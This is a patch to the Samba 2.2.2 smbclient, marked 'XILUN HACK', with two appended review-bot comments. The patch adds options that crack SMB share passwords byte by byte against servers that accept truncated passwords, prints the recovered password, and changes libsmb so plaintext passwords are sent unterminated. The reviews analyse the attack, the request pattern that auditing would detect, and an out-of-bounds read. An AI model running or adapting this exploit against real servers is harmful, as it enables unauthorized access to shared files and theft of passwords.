diff -r -C 2 samba-2.2.2/source/client/client.c samba-2.2.2-peche/source/client/client.c
*** samba-2.2.2/source/client/client.c Sat Oct 13 23:09:19 2001
--- samba-2.2.2-peche/source/client/client.c Wed Jan 9 21:46:24 2002
***************
*** 28,31 ****
--- 28,37 ----
#endif
+ /* XILUN HACK */
+ static BOOL breakin;
+ static BOOL get_full_pwd;
+ static BOOL reversed_scan;
+ /* XILUN HACK */
+
struct cli_state *cli;
extern BOOL in_client;
***************
*** 1969,1972 ****
--- 1975,1984 ----
struct cli_state *do_connect(char *server, char *share) {
+ /* XILUN HACK */
+ unsigned char scanpass[10];
+ int way;
+ int first_char;
+ int last_char;
+ /* XILUN HACK */
struct cli_state *c;
struct nmb_name called, calling;
***************
*** 2072,2079 ****
if (!cli_send_tconX(c, sharename, "?????", password, strlen(password)+1)) {
! DEBUG(0,("tree connect failed: %s\n", cli_errstr(c)));
! cli_shutdown(c);
! free(c);
! return NULL;
}
--- 2084,2134 ----
if (!cli_send_tconX(c, sharename, "?????", password, strlen(password)+1)) {
! /* XILUN HACK */
! if (!breakin) {
! DEBUG(0,("tree connect failed: %s\n", cli_errstr(c)));
! cli_shutdown(c);
! free(c);
! return NULL;
! } else {
! BOOL found = False;
! c->sec_mode = 0; /**/
! if (reversed_scan) {
! way = -1; first_char = 0xFF; last_char = 0x20;
! } else {
! way = 1; first_char = 0x20; last_char = 0xFF;
! }
! if (get_full_pwd) {
! int deep;
! for (deep = 0; deep <= 8; deep++) scanpass[deep] = 0;
! for (deep = 0; deep <= 7; deep++) {
! scanpass[deep] = first_char - way;
! while (scanpass[deep] != last_char) {
! scanpass[deep]+=way;
! if (cli_send_tconX(c, sharename,
! "?????", scanpass, deep+1))
! { found = True; break; }
! }
! if (!found || cli_send_tconX(c, sharename,
! "?????", scanpass, deep+2))
! break;
! }
! } else {
! scanpass[0] = first_char - way;
! scanpass[1] = 0;
! while (scanpass[0] != last_char) {
! scanpass[0]+=way;
! if (cli_send_tconX(c, sharename,
! "?????", scanpass, 1))
! { found = True; break; }
! }
! }
! if (!found) {
! DEBUG(0,("Sorry you're dealing with a non broken smb server\n"));
! cli_shutdown(c);
! free(c);
! return NULL;
! } else DEBUG(0,("(Partial) password found : %s\n",scanpass));
! }
! /* XILUN HACK */
}
***************
*** 2138,2141 ****
--- 2193,2201 ----
DEBUG(0,("\t-c command string execute semicolon separated commands\n"));
DEBUG(0,("\t-b xmit/send buffer changes the transmit/send buffer (default: 65520)\n"));
+ /* XILUN HACK */
+ DEBUG(0,("\t-w connect to host walking around the password\n"));
+ DEBUG(0,("\t-f display the host full password and connect\n"));
+ DEBUG(0,("\t-r use reverse order to scan the password\n"));
+ /* XILUN HACK */
DEBUG(0,("\n"));
}
***************
*** 2421,2426 ****
while ((opt =
! getopt(argc, argv,"s:O:R:M:i:Nn:d:Pp:l:hI:EU:L:t:m:W:T:D:c:b:A:")) != EOF) {
switch (opt) {
case 's':
pstrcpy(servicesf, optarg);
--- 2481,2499 ----
while ((opt =
! getopt(argc, argv,"wfrs:O:R:M:i:Nn:d:Pp:l:hI:EU:L:t:m:W:T:D:c:b:A:")) != EOF) {
switch (opt) {
+ /* XILUN HACK */
+ case 'w':
+ breakin = True;
+ break;
+ case 'f':
+ breakin = True;
+ get_full_pwd = True;
+ break;
+ case 'r':
+ breakin = True;
+ reversed_scan = True;
+ break;
+ /* XILUN HACK */
case 's':
pstrcpy(servicesf, optarg);
diff -r -C 2 samba-2.2.2/source/libsmb/cliconnect.c samba-2.2.2-peche/source/libsmb/cliconnect.c
*** samba-2.2.2/source/libsmb/cliconnect.c Fri Jul 6 04:01:37 2001
--- samba-2.2.2-peche/source/libsmb/cliconnect.c Wed Jan 9 21:45:54 2002
***************
*** 256,260 ****
* Non-encrypted passwords - convert to DOS codepage before using.
*/
! passlen = clistr_push(cli, pword, pass, -1, STR_CONVERT|STR_TERMINATE);
} else {
memcpy(pword, pass, passlen);
--- 256,263 ----
* Non-encrypted passwords - convert to DOS codepage before using.
*/
! if (pass[passlen-1] == 0)
! passlen = clistr_push(cli, pword, pass, -1, STR_CONVERT|STR_TERMINATE);
! else
! passlen = clistr_push(cli, pword, pass, -1, STR_CONVERT);
} else {
memcpy(pword, pass, passlen);
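Review bot: `c->sec_mode = 0;` in the new `else` branch of do_connect overwrites the security mode stored on the `cli_state` and nothing later in the hunk restores it, so once this path runs the connection presumably stays on the non-encrypted password branch that the cliconnect.c hunk edits. Each pass of the two `while` loops is a separate `cli_send_tconX` request carrying a 1- to 9-byte password, up to 224 per position, so on the server this appears as a dense run of rejected tree connects on one session, which is the pattern share-access auditing should alert on; the branch's own failure message indicates it only gets anywhere against a server that accepts a shorter password than the configured one. The closing `DEBUG(0, ...)` prints the recovered bytes at level 0 and formats `unsigned char scanpass[10]` with `%s`; if the branch is kept at all, that line should not emit the secret, e.g. `DEBUG(0,("tree connect succeeded with a truncated password\n"));`. do_connect begins and ends outside the hunk.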
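Review bot: The new test `pass[passlen-1] == 0` reads one byte before `pass` when a caller supplies a `passlen` of 0, and nothing in the hunk rules that out; `if (passlen <= 0 || pass[passlen-1] == 0)` keeps the original terminated push for that case. Both branches still pass `-1` as the source length, so clistr_push presumably copies up to the first NUL in `pass` rather than `passlen` bytes, and the unterminated branch therefore depends on every caller's buffer being NUL-terminated somewhere past `passlen`. Because this sits in libsmb (presumably inside cli_send_tconX), it changes what any client built on it sends for a plaintext password that lacks a trailing NUL, and a comment naming the callers expected to do that is missing. The enclosing function starts and ends outside the hunk.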